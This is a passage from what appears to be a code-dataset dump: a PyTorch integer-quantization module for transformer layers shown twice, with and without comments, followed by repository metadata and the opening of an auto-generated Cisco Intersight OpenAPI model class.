exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
scaling_factor = 1 / 2**self.output_bit
return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
super().__init__()
self.normalized_shape = normalized_shape
self.eps = eps
self.weight = nn.Parameter(torch.zeros(normalized_shape))
self.bias = nn.Parameter(torch.zeros(normalized_shape))
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "layernorm"]:
logger.info("Force dequantize layernorm")
self.quant_mode = False
self.register_buffer("shift", torch.zeros(1))
self.output_bit = output_bit
self.max_bit = 32
self.dim_sqrt = None
self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)
def set_shift(self, y_int):
with torch.no_grad():
y_sq_int = y_int**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
shift_old = self.shift
self.shift = torch.max(self.shift, shift)
logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")
def overflow_fallback(self, y_int):
self.set_shift(y_int) # adjusts `self.shift`
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
return var_int
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
mean = x.mean(axis=2, keepdim=True)
y = x - mean
var = torch.mean(y**2, axis=2, keepdim=True)
x = y / torch.sqrt(self.eps + var)
x = x * self.weight + self.bias
return x, None
# compute sqrt of the feature dimension if it is the first run
if self.dim_sqrt is None:
n = torch.tensor(x.shape[2], dtype=torch.float)
self.dim_sqrt = torch.sqrt(n).to(x.device)
# Normalization: computes mean and variance(std)
x_int = x / scaling_factor
mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
y_int = x_int - mean_int
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
# overflow handling in training time
if self.training:
# if overflow is detected
if var_int.max() >= 2**self.max_bit:
var_int = self.overflow_fallback(y_int)
assert var_int.max() < 2**self.max_bit + 0.1, (
"Error detected in overflow handling: "
"`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
)
# To be replaced with integer-sqrt kernel that produces the same output
std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
factor = floor_ste.apply(2**31 / std_int)
y_int = floor_ste.apply(y_int * factor / 2)
scaling_factor = self.dim_sqrt / 2**30
# scaling and shifting
bias = self.bias.data.detach() / (self.weight.data.detach())
bias_int = floor_ste.apply(bias / scaling_factor)
y_int = y_int + bias_int
scaling_factor = scaling_factor * self.weight
x = y_int * scaling_factor
return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
input_length = input.shape[0]
lower_index = round(input_length * (1 - lower_percentile * 0.01))
upper_index = round(input_length * upper_percentile * 0.01)
upper_bound = torch.kthvalue(input, k=upper_index).values
if lower_percentile == 0:
lower_bound = upper_bound * 0
# lower_index += 1
else:
lower_bound = -torch.kthvalue(-input, k=lower_index).values
if not output_tensor:
lower_bound = lower_bound.item()
upper_bound = upper_bound.item()
return lower_bound, upper_bound
def linear_quantize(input, scale, zero_point, inplace=False):
if len(input.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
zero_point = zero_point.view(-1, 1, 1, 1)
# reshape scale and zeropoint for linear weights
elif len(input.shape) == 2:
scale = scale.view(-1, 1)
zero_point = zero_point.view(-1, 1)
else:
scale = scale.view(-1)
zero_point = zero_point.view(-1)
# quantized = float / scale + zero_point
if inplace:
input.mul_(1.0 / scale).add_(zero_point).round_()
return input
return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
num_bits, saturation_min, saturation_max, per_channel=False
):
with torch.no_grad():
n = 2 ** (num_bits - 1) - 1
if per_channel:
scale, _ = torch.max(
torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1), dim=1
)
scale = torch.clamp(scale, min=1e-8) / n
else:
scale = max(saturation_min.abs(), saturation_max.abs())
scale = torch.clamp(scale, min=1e-8) / n
return scale
class SymmetricQuantFunction(Function):
@staticmethod
def forward(ctx, x, k, percentile_mode, scale):
zero_point = torch.tensor(0.0).to(scale.device)
n = 2 ** (k - 1) - 1
new_quant_x = linear_quantize(x, scale, zero_point, inplace=False)
new_quant_x = torch.clamp(new_quant_x, -n, n - 1)
ctx.scale = scale
return new_quant_x
@staticmethod
def backward(ctx, grad_output):
scale = ctx.scale
if len(grad_output.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
# reshape scale and zeropoint for linear weights
elif len(grad_output.shape) == 2:
scale = scale.view(-1, 1)
else:
scale = scale.view(-1)
return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.floor(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
class round_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.round(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
shape_of_input = inputs.size()
# trans the input to be a 1-d tensor
inputs = inputs.view(-1)
output_m, output_e = np.frexp(inputs.cpu().numpy())
tmp_m = []
for m in output_m:
int_m_shifted = int(
decimal.Decimal(m * (2**max_bit)).quantize(
decimal.Decimal("1"), rounding=decimal.ROUND_HALF_UP
)
)
tmp_m.append(int_m_shifted)
output_m = np.array(tmp_m)
output_e = float(max_bit) - output_e
return (
torch.from_numpy(output_m).to(inputs.device).view(shape_of_input),
torch.from_numpy(output_e).to(inputs.device).view(shape_of_input),
)
class FixedPointMul(Function):
@staticmethod
def forward(
ctx,
pre_act,
pre_act_scaling_factor,
bit_num,
z_scaling_factor,
identity=None,
identity_scaling_factor=None,
):
if len(pre_act_scaling_factor.shape) == 3:
reshape = lambda x: x # noqa: E731
else:
reshape = lambda x: x.view(1, 1, -1) # noqa: E731
ctx.identity = identity
n = 2 ** (bit_num - 1) - 1
with torch.no_grad():
pre_act_scaling_factor = reshape(pre_act_scaling_factor)
if identity is not None:
identity_scaling_factor = reshape(identity_scaling_factor)
ctx.z_scaling_factor = z_scaling_factor
z_int = torch.round(pre_act / pre_act_scaling_factor)
_A = pre_act_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m, e = batch_frexp(new_scale)
output = z_int.type(torch.double) * m.type(torch.double)
output = torch.round(output / (2.0**e))
if identity is not None:
# needs addition of identity activation
wx_int = torch.round(identity / identity_scaling_factor)
_A = identity_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m1, e1 = batch_frexp(new_scale)
output1 = wx_int.type(torch.double) * m1.type(torch.double)
output1 = torch.round(output1 / (2.0**e1))
output = output1 + output
return torch.clamp(output.type(torch.float), -n - 1, n)
@staticmethod
def backward(ctx, grad_output):
identity_grad = None
if ctx.identity is not None:
identity_grad = grad_output.clone() / ctx.z_scaling_factor
return (
grad_output.clone() / ctx.z_scaling_factor,
None,
None,
None,
None,
identity_grad,
None,
)
| 33.934848
| 105
| 0.603831
|
import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
def __init__(
self,
num_embeddings,
embedding_dim,
padding_idx=None,
max_norm=None,
norm_type=2.0,
scale_grad_by_freq=False,
sparse=False,
_weight=None,
weight_bit=8,
momentum=0.95,
quant_mode=False,
):
super().__init__()
self.num_ = num_embeddings
self.dim = embedding_dim
self.padding_idx = padding_idx
self.max_norm = max_norm
self.norm_type = norm_type
self.scale_grad_by_freq = scale_grad_by_freq
self.sparse = sparse
self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
self.register_buffer("weight_scaling_factor", torch.zeros(1))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.weight_bit = weight_bit
self.momentum = momentum
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def forward(self, x, positions=None, incremental_state=None):
if not self.quant_mode:
return (
F.embedding(
x,
self.weight,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
),
None,
)
w = self.weight
w_transform = w.data.detach()
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.weight_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, False
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
)
emb_int = F.embedding(
x,
self.weight_integer,
self.padding_idx,
self.max_norm,
self.norm_type,
self.scale_grad_by_freq,
self.sparse,
)
return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
def __init__(
self,
activation_bit,
act_range_momentum=0.95,
per_channel=False,
channel_len=None,
quant_mode=False,
):
super().__init__()
self.activation_bit = activation_bit
self.act_range_momentum = act_range_momentum
self.quant_mode = quant_mode
self.per_channel = per_channel
self.percentile = False
self.act_function = SymmetricQuantFunction.apply
if not self.per_channel:
self.register_buffer("x_min", torch.zeros(1))
self.register_buffer("x_max", torch.zeros(1))
self.register_buffer("act_scaling_factor", torch.zeros(1))
self.x_min -= 1e-5
self.x_max += 1e-5
else:
raise NotImplementedError("per-channel mode is not currently supported for activation.")
def __repr__(self):
return (
f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
f"quant_mode: {self.activation_bit}, Act_min: {self.x_min.item():.2f}, "
f"Act_max: {self.x_max.item():.2f})"
)
def forward(
self,
x,
pre_act_scaling_factor=None,
identity=None,
identity_scaling_factor=None,
specified_min=None,
specified_max=None,
):
x_act = x if identity is None else identity + x
if self.training:
assert not self.percentile, "percentile mode is not currently supported for activation."
assert (
not self.per_channel
), "per-channel mode is not currently supported for activation."
x_min = x_act.data.min()
x_max = x_act.data.max()
assert (
x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
), "NaN detected when computing min/max of the activation"
if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
self.x_min = self.x_min + x_min
self.x_max = self.x_max + x_max
elif self.act_range_momentum == -1:
self.x_min = torch.min(self.x_min, x_min)
self.x_max = torch.max(self.x_max, x_max)
else:
self.x_min = self.x_min * self.act_range_momentum + x_min * (
1 - self.act_range_momentum
)
self.x_max = self.x_max * self.act_range_momentum + x_max * (
1 - self.act_range_momentum
)
if not self.quant_mode:
return x_act, None
x_min = self.x_min if specified_min is None else specified_min
x_max = self.x_max if specified_max is None else specified_max
self.act_scaling_factor = symmetric_linear_quantization_params(
self.activation_bit, x_min, x_max, per_channel=self.per_channel
)
if pre_act_scaling_factor is None:
quant_act_int = self.act_function(
x, self.activation_bit, self.percentile, self.act_scaling_factor
)
else:
quant_act_int = FixedPointMul.apply(
x,
pre_act_scaling_factor,
self.activation_bit,
self.act_scaling_factor,
identity,
identity_scaling_factor,
)
correct_output_scale = self.act_scaling_factor.view(-1)
return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
def __init__(
self,
in_features,
out_features,
bias=True,
weight_bit=8,
bias_bit=32,
per_channel=False,
quant_mode=False,
):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
self.register_buffer("weight_integer", torch.zeros_like(self.weight))
self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
if bias:
self.bias = nn.Parameter(torch.zeros(out_features))
self.register_buffer("bias_integer", torch.zeros_like(self.bias))
self.weight_bit = weight_bit
self.quant_mode = quant_mode
self.per_channel = per_channel
self.bias_bit = bias_bit
self.quant_mode = quant_mode
self.percentile_mode = False
self.weight_function = SymmetricQuantFunction.apply
def __repr__(self):
s = super().__repr__()
s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
return s
def forward(self, x, prev_act_scaling_factor=None):
if not self.quant_mode:
return F.linear(x, weight=self.weight, bias=self.bias), None
assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
"Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
"Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
)
w = self.weight
w_transform = w.data.detach()
if self.per_channel:
w_min, _ = torch.min(w_transform, dim=1, out=None)
w_max, _ = torch.max(w_transform, dim=1, out=None)
else:
w_min = w_transform.min().expand(1)
w_max = w_transform.max().expand(1)
self.fc_scaling_factor = symmetric_linear_quantization_params(
self.weight_bit, w_min, w_max, self.per_channel
)
self.weight_integer = self.weight_function(
self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
)
bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor
if self.bias is not None:
self.bias_integer = self.weight_function(
self.bias, self.bias_bit, False, bias_scaling_factor
)
prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
x_int = x / prev_act_scaling_factor
return (
F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
* bias_scaling_factor,
bias_scaling_factor,
)
class IntGELU(qc.Module):
def __init__(self, quant_mode=True, force_dequant="none"):
super().__init__()
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "gelu"]:
logger.info("Force dequantize gelu")
self.quant_mode = False
if not self.quant_mode:
self.activation_fn = nn.GELU()
self.k = 1.4142
self.const = 14
self.coeff = [-0.2888, -1.769, 1]
self.coeff[2] /= self.coeff[0]
def int_erf(self, x_int, scaling_factor):
b_int = torch.floor(self.coeff[1] / scaling_factor)
c_int = torch.floor(self.coeff[2] / scaling_factor**2)
sign = torch.sign(x_int)
abs_int = torch.min(torch.abs(x_int), -b_int)
y_int = sign * ((abs_int + b_int) ** 2 + c_int)
scaling_factor = scaling_factor**2 * self.coeff[0]
y_int = floor_ste.apply(y_int / 2**self.const)
scaling_factor = scaling_factor * 2**self.const
return y_int, scaling_factor
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
return self.activation_fn(x), None
x_int = x / scaling_factor
sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)
shift_int = 1.0 // sigmoid_scaling_factor
x_int = x_int * (sigmoid_int + shift_int)
scaling_factor = scaling_factor * sigmoid_scaling_factor / 2
return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
super().__init__()
self.output_bit = output_bit
self.max_bit = 32
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "softmax"]:
logger.info("Force dequantize softmax")
self.quant_mode = False
self.act = QuantAct(16, quant_mode=self.quant_mode)
self.x0 = -0.6931
self.const = 30
self.coef = [0.35815147, 0.96963238, 1.0]
self.coef[1] /= self.coef[0]
self.coef[2] /= self.coef[0]
def int_polynomial(self, x_int, scaling_factor):
with torch.no_grad():
b_int = torch.floor(self.coef[1] / scaling_factor)
c_int = torch.floor(self.coef[2] / scaling_factor**2)
z = (x_int + b_int) * x_int + c_int
scaling_factor = self.coef[0] * scaling_factor**2
return z, scaling_factor
def int_exp(self, x_int, scaling_factor):
with torch.no_grad():
x0_int = torch.floor(self.x0 / scaling_factor)
x_int = torch.max(x_int, self.const * x0_int)
q = floor_ste.apply(x_int / x0_int)
r = x_int - x0_int * q
exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
scaling_factor = exp_scaling_factor / 2**self.const
return exp_int, scaling_factor
def forward(self, x, scaling_factor):
if not self.quant_mode:
return F.softmax(x, dim=-1), None
x_int = x / scaling_factor
x_int_max, _ = x_int.max(dim=-1, keepdim=True)
x_int = x_int - x_int_max
exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)
exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
exp_int = exp / exp_scaling_factor
exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
scaling_factor = 1 / 2**self.output_bit
return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
super().__init__()
self.normalized_shape = normalized_shape
self.eps = eps
self.weight = nn.Parameter(torch.zeros(normalized_shape))
self.bias = nn.Parameter(torch.zeros(normalized_shape))
self.quant_mode = quant_mode
if force_dequant in ["nonlinear", "layernorm"]:
logger.info("Force dequantize layernorm")
self.quant_mode = False
self.register_buffer("shift", torch.zeros(1))
self.output_bit = output_bit
self.max_bit = 32
self.dim_sqrt = None
self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)
def set_shift(self, y_int):
with torch.no_grad():
y_sq_int = y_int**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
shift_old = self.shift
self.shift = torch.max(self.shift, shift)
logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")
def overflow_fallback(self, y_int):
self.set_shift(y_int)
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
return var_int
def forward(self, x, scaling_factor=None):
if not self.quant_mode:
mean = x.mean(axis=2, keepdim=True)
y = x - mean
var = torch.mean(y**2, axis=2, keepdim=True)
x = y / torch.sqrt(self.eps + var)
x = x * self.weight + self.bias
return x, None
if self.dim_sqrt is None:
n = torch.tensor(x.shape[2], dtype=torch.float)
self.dim_sqrt = torch.sqrt(n).to(x.device)
x_int = x / scaling_factor
mean_int = round_ste.apply(x_int.mean(axis=2, keepdim=True))
y_int = x_int - mean_int
y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
y_sq_int = y_int_shifted**2
var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
if self.training:
if var_int.max() >= 2**self.max_bit:
var_int = self.overflow_fallback(y_int)
assert var_int.max() < 2**self.max_bit + 0.1, (
"Error detected in overflow handling: "
"`var_int` exceeds `self.max_bit` (the maximum possible bit width)"
)
std_int = floor_ste.apply(torch.sqrt(var_int)) * 2**self.shift
factor = floor_ste.apply(2**31 / std_int)
y_int = floor_ste.apply(y_int * factor / 2)
scaling_factor = self.dim_sqrt / 2**30
bias = self.bias.data.detach() / (self.weight.data.detach())
bias_int = floor_ste.apply(bias / scaling_factor)
y_int = y_int + bias_int
scaling_factor = scaling_factor * self.weight
x = y_int * scaling_factor
return x, scaling_factor
def get_percentile_min_max(input, lower_percentile, upper_percentile, output_tensor=False):
input_length = input.shape[0]
lower_index = round(input_length * (1 - lower_percentile * 0.01))
upper_index = round(input_length * upper_percentile * 0.01)
upper_bound = torch.kthvalue(input, k=upper_index).values
if lower_percentile == 0:
lower_bound = upper_bound * 0
else:
lower_bound = -torch.kthvalue(-input, k=lower_index).values
if not output_tensor:
lower_bound = lower_bound.item()
upper_bound = upper_bound.item()
return lower_bound, upper_bound
def linear_quantize(input, scale, zero_point, inplace=False):
if len(input.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
zero_point = zero_point.view(-1, 1, 1, 1)
elif len(input.shape) == 2:
scale = scale.view(-1, 1)
zero_point = zero_point.view(-1, 1)
else:
scale = scale.view(-1)
zero_point = zero_point.view(-1)
if inplace:
input.mul_(1.0 / scale).add_(zero_point).round_()
return input
return torch.round(1.0 / scale * input + zero_point)
def symmetric_linear_quantization_params(
num_bits, saturation_min, saturation_max, per_channel=False
):
with torch.no_grad():
n = 2 ** (num_bits - 1) - 1
if per_channel:
scale, _ = torch.max(
torch.stack([saturation_min.abs(), saturation_max.abs()], dim=1), dim=1
)
scale = torch.clamp(scale, min=1e-8) / n
else:
scale = max(saturation_min.abs(), saturation_max.abs())
scale = torch.clamp(scale, min=1e-8) / n
return scale
class SymmetricQuantFunction(Function):
@staticmethod
def forward(ctx, x, k, percentile_mode, scale):
zero_point = torch.tensor(0.0).to(scale.device)
n = 2 ** (k - 1) - 1
new_quant_x = linear_quantize(x, scale, zero_point, inplace=False)
new_quant_x = torch.clamp(new_quant_x, -n, n - 1)
ctx.scale = scale
return new_quant_x
@staticmethod
def backward(ctx, grad_output):
scale = ctx.scale
if len(grad_output.shape) == 4:
scale = scale.view(-1, 1, 1, 1)
elif len(grad_output.shape) == 2:
scale = scale.view(-1, 1)
else:
scale = scale.view(-1)
return grad_output.clone() / scale, None, None, None, None
class floor_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.floor(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
class round_ste(Function):
@staticmethod
def forward(ctx, x):
return torch.round(x)
@staticmethod
def backward(ctx, grad_output):
return grad_output.clone()
def batch_frexp(inputs, max_bit=31):
shape_of_input = inputs.size()
inputs = inputs.view(-1)
output_m, output_e = np.frexp(inputs.cpu().numpy())
tmp_m = []
for m in output_m:
int_m_shifted = int(
decimal.Decimal(m * (2**max_bit)).quantize(
decimal.Decimal("1"), rounding=decimal.ROUND_HALF_UP
)
)
tmp_m.append(int_m_shifted)
output_m = np.array(tmp_m)
output_e = float(max_bit) - output_e
return (
torch.from_numpy(output_m).to(inputs.device).view(shape_of_input),
torch.from_numpy(output_e).to(inputs.device).view(shape_of_input),
)
class FixedPointMul(Function):
@staticmethod
def forward(
ctx,
pre_act,
pre_act_scaling_factor,
bit_num,
z_scaling_factor,
identity=None,
identity_scaling_factor=None,
):
if len(pre_act_scaling_factor.shape) == 3:
reshape = lambda x: x
else:
reshape = lambda x: x.view(1, 1, -1)
ctx.identity = identity
n = 2 ** (bit_num - 1) - 1
with torch.no_grad():
pre_act_scaling_factor = reshape(pre_act_scaling_factor)
if identity is not None:
identity_scaling_factor = reshape(identity_scaling_factor)
ctx.z_scaling_factor = z_scaling_factor
z_int = torch.round(pre_act / pre_act_scaling_factor)
_A = pre_act_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m, e = batch_frexp(new_scale)
output = z_int.type(torch.double) * m.type(torch.double)
output = torch.round(output / (2.0**e))
if identity is not None:
wx_int = torch.round(identity / identity_scaling_factor)
_A = identity_scaling_factor.type(torch.double)
_B = (z_scaling_factor.type(torch.float)).type(torch.double)
new_scale = _A / _B
new_scale = reshape(new_scale)
m1, e1 = batch_frexp(new_scale)
output1 = wx_int.type(torch.double) * m1.type(torch.double)
output1 = torch.round(output1 / (2.0**e1))
output = output1 + output
return torch.clamp(output.type(torch.float), -n - 1, n)
@staticmethod
def backward(ctx, grad_output):
identity_grad = None
if ctx.identity is not None:
identity_grad = grad_output.clone() / ctx.z_scaling_factor
return (
grad_output.clone() / ctx.z_scaling_factor,
None,
None,
None,
None,
identity_grad,
None,
)
| true
| true
|
f71918cfc24775f026b1e9e604deca5c1ed4179d
| 18,802
|
py
|
Python
|
intersight/model/fabric_transceiver_role.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 5
|
2021-12-16T15:13:32.000Z
|
2022-03-29T16:09:54.000Z
|
intersight/model/fabric_transceiver_role.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 4
|
2022-01-25T19:05:51.000Z
|
2022-03-29T20:18:37.000Z
|
intersight/model/fabric_transceiver_role.py
|
CiscoDevNet/intersight-python
|
04b721f37c3044646a91c185c7259edfb991557a
|
[
"Apache-2.0"
] | 2
|
2020-07-07T15:01:08.000Z
|
2022-01-31T04:27:35.000Z
|
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from intersight.model.display_names import DisplayNames
from intersight.model.fabric_appliance_role import FabricApplianceRole
from intersight.model.fabric_fcoe_uplink_role import FabricFcoeUplinkRole
from intersight.model.fabric_port_policy_relationship import FabricPortPolicyRelationship
from intersight.model.fabric_port_role import FabricPortRole
from intersight.model.fabric_transceiver_role_all_of import FabricTransceiverRoleAllOf
from intersight.model.fabric_uplink_role import FabricUplinkRole
from intersight.model.mo_base_mo_relationship import MoBaseMoRelationship
from intersight.model.mo_tag import MoTag
from intersight.model.mo_version_context import MoVersionContext
globals()['DisplayNames'] = DisplayNames
globals()['FabricApplianceRole'] = FabricApplianceRole
globals()['FabricFcoeUplinkRole'] = FabricFcoeUplinkRole
globals()['FabricPortPolicyRelationship'] = FabricPortPolicyRelationship
globals()['FabricPortRole'] = FabricPortRole
globals()['FabricTransceiverRoleAllOf'] = FabricTransceiverRoleAllOf
globals()['FabricUplinkRole'] = FabricUplinkRole
globals()['MoBaseMoRelationship'] = MoBaseMoRelationship
globals()['MoTag'] = MoTag
globals()['MoVersionContext'] = MoVersionContext
class FabricTransceiverRole(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('class_id',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('object_type',): {
'APPLIANCEROLE': "fabric.ApplianceRole",
'FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'UPLINKROLE': "fabric.UplinkRole",
},
('admin_speed',): {
'AUTO': "Auto",
'1GBPS': "1Gbps",
'10GBPS': "10Gbps",
'25GBPS': "25Gbps",
'40GBPS': "40Gbps",
'100GBPS': "100Gbps",
},
('fec',): {
'AUTO': "Auto",
'CL91': "Cl91",
'CL74': "Cl74",
},
}
validations = {
('aggregate_port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 0,
},
('port_id',): {
'inclusive_maximum': 108,
'inclusive_minimum': 1,
},
('slot_id',): {
'inclusive_maximum': 5,
'inclusive_minimum': 1,
},
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'class_id': (str,), # noqa: E501
'object_type': (str,), # noqa: E501
'admin_speed': (str,), # noqa: E501
'fec': (str,), # noqa: E501
'account_moid': (str,), # noqa: E501
'create_time': (datetime,), # noqa: E501
'domain_group_moid': (str,), # noqa: E501
'mod_time': (datetime,), # noqa: E501
'moid': (str,), # noqa: E501
'owners': ([str], none_type,), # noqa: E501
'shared_scope': (str,), # noqa: E501
'tags': ([MoTag], none_type,), # noqa: E501
'version_context': (MoVersionContext,), # noqa: E501
'ancestors': ([MoBaseMoRelationship], none_type,), # noqa: E501
'parent': (MoBaseMoRelationship,), # noqa: E501
'permission_resources': ([MoBaseMoRelationship], none_type,), # noqa: E501
'display_names': (DisplayNames,), # noqa: E501
'aggregate_port_id': (int,), # noqa: E501
'port_id': (int,), # noqa: E501
'slot_id': (int,), # noqa: E501
'port_policy': (FabricPortPolicyRelationship,), # noqa: E501
}
@cached_property
def discriminator():
lazy_import()
val = {
'fabric.ApplianceRole': FabricApplianceRole,
'fabric.FcoeUplinkRole': FabricFcoeUplinkRole,
'fabric.UplinkRole': FabricUplinkRole,
}
if not val:
return None
return {'class_id': val}
attribute_map = {
'class_id': 'ClassId', # noqa: E501
'object_type': 'ObjectType', # noqa: E501
'admin_speed': 'AdminSpeed', # noqa: E501
'fec': 'Fec', # noqa: E501
'account_moid': 'AccountMoid', # noqa: E501
'create_time': 'CreateTime', # noqa: E501
'domain_group_moid': 'DomainGroupMoid', # noqa: E501
